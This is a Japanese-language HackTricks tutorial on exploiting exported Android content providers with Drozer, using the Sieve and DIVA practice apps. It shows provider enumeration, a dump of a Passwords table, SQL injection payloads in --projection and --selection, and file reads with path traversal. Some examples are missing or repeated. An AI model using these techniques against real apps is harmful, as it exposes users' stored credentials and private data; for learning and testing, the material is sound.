Exploiting Content Providers

コンテンツプロバイダの悪用

ゼロからヒーローまでのAWSハッキングを学ぶ htARTE（HackTricks AWS Red Team Expert）！

HackTricks をサポートする他の方法:

HackTricks で企業を宣伝したいまたは HackTricks をPDFでダウンロードしたい場合は、サブスクリプションプランをチェックしてください！
公式PEASS＆HackTricksグッズを入手する
The PEASS Familyを発見し、独占的なNFTコレクションを見つける
**💬 Discordグループ**に参加するか、telegramグループに参加するか、Twitter 🐦 @carlospolopmをフォローする。
ハッキングテクニックを共有するために、PRを HackTricks および HackTricks Cloud のGitHubリポジトリに提出してください。

イントロ

データは、コンテンツプロバイダと呼ばれるコンポーネントによって、他のアプリケーションにリクエストに応じて供給されます。これらのリクエストは、ContentResolverクラスのメソッドを介して管理されます。コンテンツプロバイダは、データベース、ファイル、またはネットワーク上など、さまざまな場所にデータを保存できます。

_Manifest.xml_ファイルでは、コンテンツプロバイダの宣言が必要です。たとえば：

<provider android:name=".DBContentProvider" android:exported="true" android:multiprocess="true" android:authorities="com.mwr.example.sieve.DBContentProvider">
<path-permission android:readPermission="com.mwr.example.sieve.READ_KEYS" android:writePermission="com.mwr.example.sieve.WRITE_KEYS" android:path="/Keys"/>
</provider>

アクセスするには、content://com.mwr.example.sieve.DBContentProvider/Keys には READ_KEYS パーミッションが必要です。興味深いことに、パス /Keys/ は開発者のミスにより保護されていないセクションでアクセス可能です。開発者は /Keys を保護しましたが、/Keys/ を宣言しました。

おそらく、プライベートデータにアクセスしたり、脆弱性（SQLインジェクションまたはパストラバーサル）を悪用したりできるかもしれません。

公開されたコンテンツプロバイダーから情報を取得する

dz> run app.provider.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
Authority: com.mwr.example.sieve.DBContentProvider
Read Permission: null
Write Permission: null
Content Provider: com.mwr.example.sieve.DBContentProvider
Multiprocess Allowed: True
Grant Uri Permissions: False
Path Permissions:
Path: /Keys
Type: PATTERN_LITERAL
Read Permission: com.mwr.example.sieve.READ_KEYS
Write Permission: com.mwr.example.sieve.WRITE_KEYS
Authority: com.mwr.example.sieve.FileBackupProvider
Read Permission: null
Write Permission: null
Content Provider: com.mwr.example.sieve.FileBackupProvider
Multiprocess Allowed: True
Grant Uri Permissions: False

以下のようにしてDBContentProviderに到達する方法を組み立てることが可能です。これは、Drozerを使用して得られた洞察に基づいており、重要な情報が_ /Keys_ディレクトリにあることがわかりました。

Drozerは、複数のURIを推測して試すことができます：

dz> run scanner.provider.finduris -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Unable to Query content://com.mwr.example.sieve.DBContentProvider/
...
Unable to Query content://com.mwr.example.sieve.DBContentProvider/Keys
Accessible content URIs:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/

また、ContentProviderコードをチェックしてクエリを検索する必要があります：

また、完全なクエリを見つけられない場合は、onCreateメソッドでContentProviderによって宣言された名前をチェックすることができます：

クエリは次のようになります：content://name.of.package.class/declared_name

データベースをバックエンドとするContent Provider

おそらく、ほとんどのContent Providerはデータベースのインターフェースとして使用されています。したがって、アクセスできれば情報を抽出、更新、挿入、削除することができるかもしれません。 アクセスできるかどうかを確認し、機密情報にアクセスできるかどうかを確認するか、認証をバイパスすることができるかどうかを試してください。

Content Providerのコードをチェックする際には、_query、insert、update、delete_などの名前の関数もチェックしてください：

これらを呼び出すことができるからです

コンテンツのクエリ

dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
_id: 1
service: Email
username: incognitoguy50
password: PSFjqXIMVa5NJFudgDuuLVgJYFD+8w==
-
email: incognitoguy50@gmail.com

コンテンツの挿入

データベースをクエリすると、列の名前を知ることができ、その後、DBにデータを挿入できる可能性があります：

挿入と更新では、文字列を示すには--string、倍精度を示すには--double、浮動小数点数を示すには--float、整数を示すには--integer、長整数を示すには--long、短整数を示すには--short、ブール値を示すには--booleanを使用できます

コンテンツの更新

列の名前を知っていれば、エントリを変更することもできます：

コンテンツの削除

SQLインジェクション

コンテンツプロバイダに渡されるプロジェクションと選択フィールドを操作することで、SQLインジェクション**(SQLite)**を簡単にテストできます。コンテンツプロバイダをクエリする際には、情報を検索するための興味深い引数が2つあります：--selection と --projection：

これらのパラメータを濫用してSQLインジェクションをテストすることができます：

dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')

dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "*
FROM SQLITE_MASTER WHERE type='table';--"
| type  | name             | tbl_name         | rootpage | sql              |
| table | android_metadata | android_metadata | 3        | CREATE TABLE ... |
| table | Passwords        | Passwords        | 4        | CREATE TABLE ... |

Drozerによる自動SQLInjectionの発見

dz> run scanner.provider.injection -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Injection in Projection:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/
Injection in Selection:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/

dz> run scanner.provider.sqltables -a jakhar.aseem.diva
Scanning jakhar.aseem.diva...
Accessible tables for uri content://jakhar.aseem.diva.provider.notesprovider/notes/:
android_metadata
notes
sqlite_sequence

ファイルシステムベースのコンテンツプロバイダ

コンテンツプロバイダはファイルにアクセスするためにも使用できます:

ファイルの読み取り

コンテンツプロバイダからファイルを読み取ることができます

dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
127.0.0.1            localhost

パストラバーサル

ファイルにアクセスできる場合、パストラバーサルを悪用することができます（この場合、必須ではありませんが、"../" などのトリックを試すことができます）。

dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
127.0.0.1            localhost

Drozerによる自動パストラバーサルの発見

dz> run scanner.provider.traversal -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Vulnerable Providers:
content://com.mwr.example.sieve.FileBackupProvider/
content://com.mwr.example.sieve.FileBackupProvider

参考文献

ゼロからヒーローまでのAWSハッキングを学ぶ htARTE（HackTricks AWS Red Team Expert）！

HackTricksをサポートする他の方法:

HackTricksで企業を宣伝したいまたはHackTricksをPDFでダウンロードしたい場合は、SUBSCRIPTION PLANSをチェックしてください！
公式PEASS＆HackTricksスウォッグを入手する
The PEASS Familyを発見し、独占的なNFTsのコレクションを見つける
**💬 Discordグループまたはtelegramグループに参加するか、Twitter 🐦 @carlospolopmをフォローする。
HackTricksとHackTricks CloudのGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有する。

PreviousDrozer Tutorial NextExploiting a debuggeable application

Last updated 3 days ago